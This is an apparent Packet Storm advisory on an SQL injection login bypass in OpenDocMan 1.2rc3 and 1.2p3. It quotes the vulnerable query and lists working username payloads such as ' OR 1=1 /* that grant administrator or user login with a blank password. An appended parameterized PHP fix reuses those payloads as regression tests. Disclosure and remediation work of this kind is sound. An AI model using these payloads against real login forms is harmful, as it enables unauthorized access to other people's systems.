opendocman-1.2rc3.txt

2006-10-30T00:00:00
ID PACKETSTORM:51476
Type packetstorm
Reporter k1tk4t
Modified 2006-10-30T00:00:00

Description

                                        
`########################################################################  
# opendocman <= 1.2rc3 Bypass admin/user Login  
# opendocman-1.2p3 is affected as well  
# Download Source : http://www.opendocman.com/  
#  
# Found By : k1tk4t - k1tk4t[4t]newhack.org  
# Location : Indonesia -- #newhack[dot]org @irc.dal.net  
########################################################################  
file;  
index.php  
########################################################################  
bugs;  
// both POST values are placed in the SQL string without escaping  
$frmuser = $_POST['frmuser'];  
$frmpass = $_POST['frmpass'];  
$query = "SELECT id, username, password FROM user WHERE username = '$frmuser' AND password = password('$frmpass')";  
// on failure the full query and the MySQL error are echoed to the client  
$result = mysql_query("$query") or die ("Error in query: $query. " . mysql_error());  
########################################################################  
exploit/POC;  
if magic_quotes_gpc = Off, you can do this;  
  
for opendocman-1.2rc3  
Login administrator  
username : ' OR 1=1 /*  
password : blank  
  
Login User  
username : username' /*  
password : blank  
  
opendocman-1.2p3  
Login Form  
username : admin' /*  
password : blank  
opendocman-1.2p3 uses;  
if(!valid_username($_POST['frmuser']  
so you can only bypass the login for a username that exists in the database  
http://www.opendocman.com/demo/index.php  
########################################################################  
Thanks;  
str0ke  
xoron [www.xoron.biz]  
[mR]opt1lc,VaL,y3dips,lirva32,the_day,K-159  
evilcode,illibero,NoGe,nyubi,x-ace,ghoz,  
home_edition2001,matdhule,iFX,  
and for all (friends & enemies)  
@irc.dal.net  
#newhack[dot]org [all member&staff]  
#e-c-h-o [all member echo community]  
#nyubicrew [all member solpotcrew community]  
#asiahacker [all member asiahacker community]  
  
  
--   
best regards  
  
k1tk4t  
http://newhack.org  
newhack[dot]org@irc.dal.net  
`
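The query quoted from index.php builds its WHERE clause by concatenating `$_POST['frmuser']`. The block below is an added example, not OpenDocMan code and not part of the advisory, showing the same lookup as a parameterized query with the password verified in PHP. The function name `check_login()`, the in-memory SQLite table, the sample password and the switch from MySQL `password()` to `password_hash()` are assumptions made for the example.

```php
<?php
// Added example, not OpenDocMan code. check_login() is a hypothetical name.
// Assumes the `user` table from the advisory, with the password column
// holding password_hash() output instead of MySQL password() output.

function check_login(PDO $pdo, $frmuser, $frmpass)
{
    // Reject non-string input (e.g. frmuser[]=x arrays) before it reaches SQL.
    if (!is_string($frmuser) || !is_string($frmpass) || $frmuser === '') {
        return null;
    }
    // The placeholder sends the username as data; quotes and comment
    // markers inside it cannot change the structure of the statement.
    $stmt = $pdo->prepare('SELECT id, password FROM user WHERE username = ?');
    $stmt->execute([$frmuser]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    // Verify the password in PHP, so a matching row alone never grants a login.
    if ($row === false || !password_verify($frmpass, $row['password'])) {
        return null;
    }
    return (int) $row['id'];
}

// Constructed test data in an in-memory SQLite database (runs offline).
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE user (id INTEGER PRIMARY KEY, username TEXT UNIQUE, password TEXT)');
$ins = $pdo->prepare('INSERT INTO user (username, password) VALUES (?, ?)');
$ins->execute(['admin', password_hash('constructed-sample-pw', PASSWORD_DEFAULT)]);

// Regression cases: the three username values listed in the advisory with a
// blank password, followed by one legitimate login.
$cases = [
    ["' OR 1=1 /*", ''],
    ["username' /*", ''],
    ["admin' /*", ''],
    ['admin', 'constructed-sample-pw'],
];
foreach ($cases as [$u, $p]) {
    $id = check_login($pdo, $u, $p);
    printf("%-16s => %s\n", $u, $id === null ? 'rejected' : "user id $id");
}
```

`magic_quotes_gpc`, which the advisory names as the precondition, was removed in PHP 5.4, so it cannot serve as the mitigation; the bound parameter is what keeps the input out of the SQL grammar.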